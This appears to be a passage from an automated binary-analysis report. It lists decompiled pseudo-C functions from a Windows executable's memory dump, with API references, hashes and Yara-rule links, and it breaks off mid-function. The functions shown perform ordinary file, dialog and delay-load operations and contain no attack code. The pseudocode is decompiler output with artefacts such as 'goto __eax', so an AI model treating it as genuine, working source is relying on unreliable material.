                                                                                                                                                    • Instruction ID: 2cb79403b8cc6837e5c7161dd748c1c16fbff3c14d0c9e7b8212d742651f9e98
                                                                                                                                                    • Opcode Fuzzy Hash: 05a7a3c79e34af3dbd4746ad57af6297aac750f826fc0d3efcab02b76be4be7f
                                                                                                                                                    • Instruction Fuzzy Hash: 37E0ECA117061397E631376E6C0476B794CAFD15A0F140311FF149D6A0FBA0D40081E1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01219670, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E01219670(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
					E01216DD3(0x124ff50, _t21 + 0x1e);
				}
				return _t16;
			}





                                                                                                                                                    0x01219672
                                                                                                                                                    0x01219674
                                                                                                                                                    0x0121967a
                                                                                                                                                    0x01219680
                                                                                                                                                    0x01219691
                                                                                                                                                    0x01219696
                                                                                                                                                    0x01219698
                                                                                                                                                    0x01219698
                                                                                                                                                    0x0121969a
                                                                                                                                                    0x0121969a
                                                                                                                                                    0x0121969e
                                                                                                                                                    0x012196a4
                                                                                                                                                    0x012196b4
                                                                                                                                                    0x012196b4
                                                                                                                                                    0x012196bd

                                                                                                                                                    APIs
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,01219624), ref: 0121968B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                    • Opcode ID: c075b4ca6ba0a2f9da0915ce01a7a641d2ea5daaf17d067d3fa51bbdcc916d00
                                                                                                                                                    • Instruction ID: bd6bf9e0ec538d268e09d4444ab89e838a76115ab3055c13278d83e07e9c3ed1
                                                                                                                                                    • Opcode Fuzzy Hash: c075b4ca6ba0a2f9da0915ce01a7a641d2ea5daaf17d067d3fa51bbdcc916d00
                                                                                                                                                    • Instruction Fuzzy Hash: 6CF0B4300627528FEF35CA28951879677E45B22229F045F1DC2F7438D4D761608CCB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121A406, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0121A406(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E0121B865(_a4) == 0) {
					_t12 = E0121A534(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E0121A122( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E0121A13A( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}





                                                                                                                                                    0x0121a407
                                                                                                                                                    0x0121a40f
                                                                                                                                                    0x0121a41d
                                                                                                                                                    0x0121a42a
                                                                                                                                                    0x0121a432
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121a435
                                                                                                                                                    0x0121a441
                                                                                                                                                    0x0121a453
                                                                                                                                                    0x0121a45e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121a464
                                                                                                                                                    0x0121a41f
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0121A435
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                    • Opcode ID: cbf8d68d8b9e6559965a28d70ef7e54968a6d436932b7dd109c8a7730e8e9a1f
                                                                                                                                                    • Instruction ID: c9e2f5d95e0e8b909d1828ef34f0ef0a6c3bf5f0bdf040ac74df7511809be12f
                                                                                                                                                    • Opcode Fuzzy Hash: cbf8d68d8b9e6559965a28d70ef7e54968a6d436932b7dd109c8a7730e8e9a1f
                                                                                                                                                    • Instruction Fuzzy Hash: 74F0E93541A3C0ABCA229B7858087D7BFE1AF35371F04CA09E2FD13199C27550858721
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012205DA, Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E012205DA() {
				void* __esi;
				void* _t2;

				L012212A7(); // executed
				_t2 = E012212AC();
				if(_t2 != 0) {
					_t2 = E01216E21(_t2, 0x124ff50, 0xff, 0xff);
				}
				if( *0x124ff5b != 0) {
					_t2 = E01216E21(_t2, 0x124ff50, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}





                                                                                                                                                    0x012205dc
                                                                                                                                                    0x012205e1
                                                                                                                                                    0x012205f2
                                                                                                                                                    0x012205f7
                                                                                                                                                    0x012205f7
                                                                                                                                                    0x01220603
                                                                                                                                                    0x01220608
                                                                                                                                                    0x01220608
                                                                                                                                                    0x0122060f
                                                                                                                                                    0x01220617

                                                                                                                                                    APIs
                                                                                                                                                    • SetThreadExecutionState.KERNEL32 ref: 0122060F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2211380416-0
                                                                                                                                                    • Opcode ID: 3f64699fe31fa95a9f81771b4ff4938d392a62e9eff438b15d87486106d61917
                                                                                                                                                    • Instruction ID: e75b88bdd09b99c03036c81e1a5e69422eb1c4c7742b89b3f5a0d38af9bd9e1a
                                                                                                                                                    • Opcode Fuzzy Hash: 3f64699fe31fa95a9f81771b4ff4938d392a62e9eff438b15d87486106d61917
                                                                                                                                                    • Instruction Fuzzy Hash: F2D0C214A3003337EB31326C7408FFE1E874FE3111F090125F308661C6CE89044282A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01229D2F, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                    			E01229D2F(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L0122E06A();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E01229A7F(__eax, _a4, _a8); // executed
				return _t6;
			}





                                                                                                                                                    0x01229d32
                                                                                                                                                    0x01229d33
                                                                                                                                                    0x01229d35
                                                                                                                                                    0x01229d3a
                                                                                                                                                    0x01229d3f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01229d50
                                                                                                                                                    0x01229d49
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 01229D35
                                                                                                                                                      • Part of subcall function 01229A7F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 01229AA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1915507550-0
                                                                                                                                                    • Opcode ID: e13b48070a70aae3dd87dac9b967e8d4079dc715caa04fc070f3b589795e5392
                                                                                                                                                    • Instruction ID: 1dc4a8c5c480cece6f152aba2a3407893ed95172e1207bec0fa6d8da8b1fd57e
                                                                                                                                                    • Opcode Fuzzy Hash: e13b48070a70aae3dd87dac9b967e8d4079dc715caa04fc070f3b589795e5392
                                                                                                                                                    • Instruction Fuzzy Hash: 2DD0A73022023E7ADF40BA65CC12BBD7B98DB10200F008175EE0895150ED72DE90B361
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01219929, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E01219929(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}




                                                                                                                                                    0x0121992d
                                                                                                                                                    0x01219935
                                                                                                                                                    0x0121993e
                                                                                                                                                    0x0121994b
                                                                                                                                                    0x01219945
                                                                                                                                                    0x01219947
                                                                                                                                                    0x01219947
                                                                                                                                                    0x0121992f
                                                                                                                                                    0x01219931
                                                                                                                                                    0x01219931

                                                                                                                                                    APIs
                                                                                                                                                    • GetFileType.KERNELBASE(000000FF,01219827), ref: 01219935
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileType
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3081899298-0
                                                                                                                                                    • Opcode ID: d01ea8eab443529428425848f947b9bf20508009dae7c368fa3b8c5dbb4e1d27
                                                                                                                                                    • Instruction ID: 7276442551febfbd53d6dda7c312503b24dc9c5aef96eeac1d8488170d79ab37
                                                                                                                                                    • Opcode Fuzzy Hash: d01ea8eab443529428425848f947b9bf20508009dae7c368fa3b8c5dbb4e1d27
                                                                                                                                                    • Instruction Fuzzy Hash: 62D01231021143968F32893D5A5909A6AD39B5327EB38C7E4E225CA0A9C722C483F542
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D270, Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0122D270(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0x1257438, 0x6a, 0x402, E0121FA2C(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E0122ABC4(); // executed
				return _t7;
			}




                                                                                                                                                    0x0122d295
                                                                                                                                                    0x0122d29b
                                                                                                                                                    0x0122d2a0

                                                                                                                                                    APIs
                                                                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0122D295
                                                                                                                                                      • Part of subcall function 0122ABC4: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0122ABD5
                                                                                                                                                      • Part of subcall function 0122ABC4: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0122ABE6
                                                                                                                                                      • Part of subcall function 0122ABC4: IsDialogMessageW.USER32(0016006C,?), ref: 0122ABFA
                                                                                                                                                      • Part of subcall function 0122ABC4: TranslateMessage.USER32(?), ref: 0122AC08
                                                                                                                                                      • Part of subcall function 0122ABC4: DispatchMessageW.USER32(?), ref: 0122AC12
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 897784432-0
                                                                                                                                                    • Opcode ID: 846c67b990b32b1d5d03e91e428183f8b27529626f617d281a413dbe95d72af9
                                                                                                                                                    • Instruction ID: 49231c58dc28060eab02b5ad73b1700ea5b8045b02d77747b7448fa0b88d703e
                                                                                                                                                    • Opcode Fuzzy Hash: 846c67b990b32b1d5d03e91e428183f8b27529626f617d281a413dbe95d72af9
                                                                                                                                                    • Instruction Fuzzy Hash: E1D09E32254300BAD7126B51DE0AF1A7EE7EFA8B04F404554B345740E586629E319B16
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D925, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D925() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124adc4, 0x127104c); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d900
                                                                                                                                                    0x0122d908
                                                                                                                                                    0x0122d90f

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D908
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 9c4e231adab74276c7e7bcf4f3174f88307c78b4ca7201d35bb8cecb48bace6d
                                                                                                                                                    • Instruction ID: e5fdbef10acf6aee415853de14dc4406e6ab76f4166468b2f9fc8ff9bff9c6ee
                                                                                                                                                    • Opcode Fuzzy Hash: 9c4e231adab74276c7e7bcf4f3174f88307c78b4ca7201d35bb8cecb48bace6d
                                                                                                                                                    • Instruction Fuzzy Hash: A4B012F73B842AFE324871956D07D3F010CC4D0B12370C00EFC05C10C0D4880C000031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D92F, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D92F() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124adc4, 0x1271050); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d900
                                                                                                                                                    0x0122d908
                                                                                                                                                    0x0122d90f

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D908
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 81cd09c820bcb46eb66d561ed60948895e00997ebe795ca203dcc1871141e8e4
                                                                                                                                                    • Instruction ID: e022c9a5856208d02be80207c4474c737cd2fce9d02caf8a848938337efc5f8e
                                                                                                                                                    • Opcode Fuzzy Hash: 81cd09c820bcb46eb66d561ed60948895e00997ebe795ca203dcc1871141e8e4
                                                                                                                                                    • Instruction Fuzzy Hash: 05B012E33B843ABE314871956C06E3F010CE4D0A12370C40EF405C10C4E4840C040031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D957, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122D957() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124adc4, 0x1271060); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d900
                                                                                                                                                    0x0122d908
                                                                                                                                                    0x0122d90f

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D908
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 1a5cafa8b1932d203cc9a8cb5e2d1cd3652bdc9d3f6e409830e106a0da0a28a4
                                                                                                                                                    • Instruction ID: 401c1122d49f03a5b6c9ddf5cb3b155b3b15cf89ff65bfc9867b7dc735ec8a51
                                                                                                                                                    • Opcode Fuzzy Hash: 1a5cafa8b1932d203cc9a8cb5e2d1cd3652bdc9d3f6e409830e106a0da0a28a4
                                                                                                                                                    • Instruction Fuzzy Hash: 7CB012E33F853EBE314871956C06E3F010CE4D0A12370800EF405C10C4D4840C000131
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122E04F, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122E04F() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ae84, 0x1271034); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122e059
                                                                                                                                                    0x0122e061
                                                                                                                                                    0x0122e068

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122E061
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 21578829a3c36ba01a6d2806a83c8792289bef139c622c5e0e7831d05cab438f
                                                                                                                                                    • Instruction ID: 4cec3237cfa3e8da3c8d1a25f1d6a0e5ce01903a69340ba44bb72978033147fa
                                                                                                                                                    • Opcode Fuzzy Hash: 21578829a3c36ba01a6d2806a83c8792289bef139c622c5e0e7831d05cab438f
                                                                                                                                                    • Instruction Fuzzy Hash: 1BB012B73BE0227D311821911D02D3F030CD5D0950321C01EF511D5080D4890C020031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DA34, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122DA34() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0122DDAF(_t3, _t4, _t8, _t9, _t10, 0x124ae24, 0x1271090); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da23
                                                                                                                                                    0x0122da2b
                                                                                                                                                    0x0122da32

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA2B
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: ed467cfe20e3cbd54dd94548bcb490a50d9fc2a746388285237920cc25a24a5d
                                                                                                                                                    • Instruction ID: 90f11763604370a052c2b1207e292b5452671c9d125f2e7f56f37284a451240b
                                                                                                                                                    • Opcode Fuzzy Hash: ed467cfe20e3cbd54dd94548bcb490a50d9fc2a746388285237920cc25a24a5d
                                                                                                                                                    • Instruction Fuzzy Hash: FBB012A33BC4267D304862A61C06F3F014CE4E0B10330802EF411C5044D4C40C040031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DA3E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122DA3E() {
